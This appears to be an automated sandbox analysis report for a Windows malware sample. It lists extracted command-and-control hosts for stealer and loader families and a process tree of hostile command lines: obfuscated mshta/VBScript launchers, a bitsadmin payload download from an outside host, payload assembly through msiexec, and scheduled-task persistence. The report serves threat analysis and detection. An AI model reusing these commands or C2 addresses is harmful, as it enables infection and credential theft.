Resubmissions

10-11-2021 14:52

211110-r84p8ahcb5 10

10-11-2021 14:46

211110-r5g22seddm 10

10-11-2021 14:39

211110-r1a3yaedcq 6

10-11-2021 14:22

211110-rptqxahbf9 10

Analysis

  • max time kernel
    601s
  • max time network
    613s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    10-11-2021 14:52

General

  • Target

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

  • Size

    403KB

  • MD5

    f957e397e71010885b67f2afe37d8161

  • SHA1

    a8bf84b971b37ac6e7f66c5e5a7e971a7741401e

  • SHA256

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66

  • SHA512

    8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

socelars

C2

http://www.hhgenice.top/

Extracted

Family

smokeloader

Version

2020

C2

http://misha.at/upload/

http://roohaniinfra.com/upload/

http://0axqpcc.cn/upload/

http://mayak-lombard.ru/upload/

http://mebel-lass.ru/upload/

http://dishakhan.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1011h

C2

charirelay.xyz:80

Extracted

Family

redline

Botnet

udptest

C2

193.56.146.64:65441

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 54 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • VMProtect packed file 5 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 55 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 47 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1848
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2340
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2360
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          PID:2580
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:2188
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1444
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1336
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1300
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                1⤵
                  PID:2688
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                    PID:2680
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1140
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1072
                      • C:\Users\Admin\AppData\Roaming\agigjfr
                        C:\Users\Admin\AppData\Roaming\agigjfr
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:26124
                      • \??\c:\windows\system\svchost.exe
                        c:\windows\system\svchost.exe
                        2⤵
                          PID:26228
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:372
                        • C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
                          "C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
                          1⤵
                          • Checks computer location settings
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3540
                          • C:\Users\Admin\Pictures\Adobe Films\SNnqFILwfkwvefS4kT6hT4Zz.exe
                            "C:\Users\Admin\Pictures\Adobe Films\SNnqFILwfkwvefS4kT6hT4Zz.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4256
                          • C:\Users\Admin\Pictures\Adobe Films\nvmMIbcsHnDyMKaBte14YqXk.exe
                            "C:\Users\Admin\Pictures\Adobe Films\nvmMIbcsHnDyMKaBte14YqXk.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3832
                          • C:\Users\Admin\Pictures\Adobe Films\tloLjiSwS04OtI1v1Aybr8mN.exe
                            "C:\Users\Admin\Pictures\Adobe Films\tloLjiSwS04OtI1v1Aybr8mN.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of SetThreadContext
                            PID:3672
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              3⤵
                                PID:1028
                                • C:\Users\Admin\AppData\Local\Temp\fl.exe
                                  "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                                  4⤵
                                    PID:12580
                                    • C:\Users\Admin\AppData\Local\Temp\Curarization.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Curarization.exe"
                                      5⤵
                                        PID:13784
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 552
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2288
                                • C:\Users\Admin\Pictures\Adobe Films\dk6EPOehW6KoMl6iCA1ZfsNc.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\dk6EPOehW6KoMl6iCA1ZfsNc.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:4588
                                  • C:\Users\Admin\Documents\PDN71uu_VARx7g2H7QJ3rxyk.exe
                                    "C:\Users\Admin\Documents\PDN71uu_VARx7g2H7QJ3rxyk.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:3564
                                    • C:\Users\Admin\Pictures\Adobe Films\OTKgrMpCv5Tc8nPtDz77El8E.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\OTKgrMpCv5Tc8nPtDz77El8E.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5840
                                    • C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:7152
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                        5⤵
                                          PID:5696
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\wNeu6x4tSZE4erWhnovPcPgc.exe" ) do taskkill -f -iM "%~NxM"
                                            6⤵
                                              PID:7160
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4680
                                              • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5992
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                  8⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5480
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                    9⤵
                                                      PID:5732
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                    8⤵
                                                      PID:4560
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                        9⤵
                                                          PID:4688
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            10⤵
                                                            • Executes dropped EXE
                                                            PID:5280
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                            10⤵
                                                              PID:3628
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                              10⤵
                                                                PID:3904
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                msiexec -Y ..\lXQ2g.WC
                                                                10⤵
                                                                • Loads dropped DLL
                                                                PID:4944
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill -f -iM "wNeu6x4tSZE4erWhnovPcPgc.exe"
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4116
                                                  • C:\Users\Admin\Pictures\Adobe Films\1829GSEn2UGwCWrcJXbBHmtm.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\1829GSEn2UGwCWrcJXbBHmtm.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:7144
                                                  • C:\Users\Admin\Pictures\Adobe Films\CzNferWsE99QGffEtMF_mYVZ.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\CzNferWsE99QGffEtMF_mYVZ.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:7132
                                                  • C:\Users\Admin\Pictures\Adobe Films\pDEStyBEOrdEtYOrlc4Uk2mR.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\pDEStyBEOrdEtYOrlc4Uk2mR.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:4728
                                                  • C:\Users\Admin\Pictures\Adobe Films\ujE9HHP3QnjB2buXWwu8j1lt.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\ujE9HHP3QnjB2buXWwu8j1lt.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:7124
                                                  • C:\Users\Admin\Pictures\Adobe Films\OjT4luGmlv0kCCVjsm3V7cA2.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\OjT4luGmlv0kCCVjsm3V7cA2.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5308
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      5⤵
                                                        PID:4464
                                                      • C:\Users\Admin\Pictures\Adobe Films\OjT4luGmlv0kCCVjsm3V7cA2.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\OjT4luGmlv0kCCVjsm3V7cA2.exe" -u
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:5348
                                                    • C:\Users\Admin\Pictures\Adobe Films\8i8Y8Caxi2AgKidT1pfq6NWa.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\8i8Y8Caxi2AgKidT1pfq6NWa.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:6564
                                                    • C:\Users\Admin\Pictures\Adobe Films\O8rnURPtjlPEbyeSgy2SH9A3.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\O8rnURPtjlPEbyeSgy2SH9A3.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      PID:6576
                                                    • C:\Users\Admin\Pictures\Adobe Films\Itr75Ry_MsmRlMBNkrdPYGwI.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\Itr75Ry_MsmRlMBNkrdPYGwI.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:6988
                                                      • C:\Users\Admin\AppData\Local\Temp\is-B9HK8.tmp\Itr75Ry_MsmRlMBNkrdPYGwI.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-B9HK8.tmp\Itr75Ry_MsmRlMBNkrdPYGwI.tmp" /SL5="$40268,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Itr75Ry_MsmRlMBNkrdPYGwI.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:4696
                                                        • C:\Users\Admin\AppData\Local\Temp\is-39JQF.tmp\DYbALA.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-39JQF.tmp\DYbALA.exe" /S /UID=2709
                                                          6⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Drops file in Program Files directory
                                                          PID:188
                                                          • C:\Users\Admin\AppData\Local\Temp\2c-7ba74-e21-051be-f90c2a5bea2bc\Bivobizhavu.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\2c-7ba74-e21-051be-f90c2a5bea2bc\Bivobizhavu.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5776
                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                              dw20.exe -x -s 2288
                                                              8⤵
                                                                PID:13064
                                                            • C:\Users\Admin\AppData\Local\Temp\4d-18d4d-cbe-f2c83-e6c6621aeeb69\Cokaexaduzhae.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\4d-18d4d-cbe-f2c83-e6c6621aeeb69\Cokaexaduzhae.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5984
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i30maujh.0g4\GcleanerEU.exe /eufive & exit
                                                                8⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:11800
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfaorx2v.0gy\installer.exe /qn CAMPAIGN="654" & exit
                                                                8⤵
                                                                  PID:12692
                                                                  • C:\Users\Admin\AppData\Local\Temp\xfaorx2v.0gy\installer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\xfaorx2v.0gy\installer.exe /qn CAMPAIGN="654"
                                                                    9⤵
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:13636
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xfaorx2v.0gy\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xfaorx2v.0gy\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636358378 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                      10⤵
                                                                        PID:17996
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paweorlh.b4d\any.exe & exit
                                                                    8⤵
                                                                      PID:12968
                                                                      • C:\Users\Admin\AppData\Local\Temp\paweorlh.b4d\any.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\paweorlh.b4d\any.exe
                                                                        9⤵
                                                                          PID:13776
                                                                          • C:\Users\Admin\AppData\Local\Temp\paweorlh.b4d\any.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\paweorlh.b4d\any.exe" -u
                                                                            10⤵
                                                                              PID:14128
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ngxqjqom.knt\gcleaner.exe /mixfive & exit
                                                                          8⤵
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:13320
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zt4dyu1f.cgf\autosubplayer.exe /S & exit
                                                                          8⤵
                                                                            PID:13592
                                                                            • C:\Users\Admin\AppData\Local\Temp\zt4dyu1f.cgf\autosubplayer.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\zt4dyu1f.cgf\autosubplayer.exe /S
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              PID:13804
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                10⤵
                                                                                  PID:16400
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                  10⤵
                                                                                    PID:19108
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                    10⤵
                                                                                      PID:19432
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                      10⤵
                                                                                        PID:19996
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                        10⤵
                                                                                          PID:20288
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                          10⤵
                                                                                            PID:20620
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                            10⤵
                                                                                            • Checks for any installed AV software in registry
                                                                                            PID:21148
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                            "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                            10⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:21640
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVrfDXva0yyyMOk6 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            10⤵
                                                                                              PID:24000
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -piU1sZN2lCj49coM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              10⤵
                                                                                                PID:29852
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:24120
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:24320
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:24540
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                      10⤵
                                                                                                        PID:24884
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                        10⤵
                                                                                                          PID:25212
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss7308.tmp\tempfile.ps1"
                                                                                                          10⤵
                                                                                                            PID:25796
                                                                                                    • C:\Program Files\Reference Assemblies\YXCIOAJSIV\foldershare.exe
                                                                                                      "C:\Program Files\Reference Assemblies\YXCIOAJSIV\foldershare.exe" /VERYSILENT
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5188
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4100
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:5076
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\C1OALms3jxFeXUWn9_NboQID.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\C1OALms3jxFeXUWn9_NboQID.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4180
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\g3p7hyDy6LpIJ_0pXEyPWoHD.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\g3p7hyDy6LpIJ_0pXEyPWoHD.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
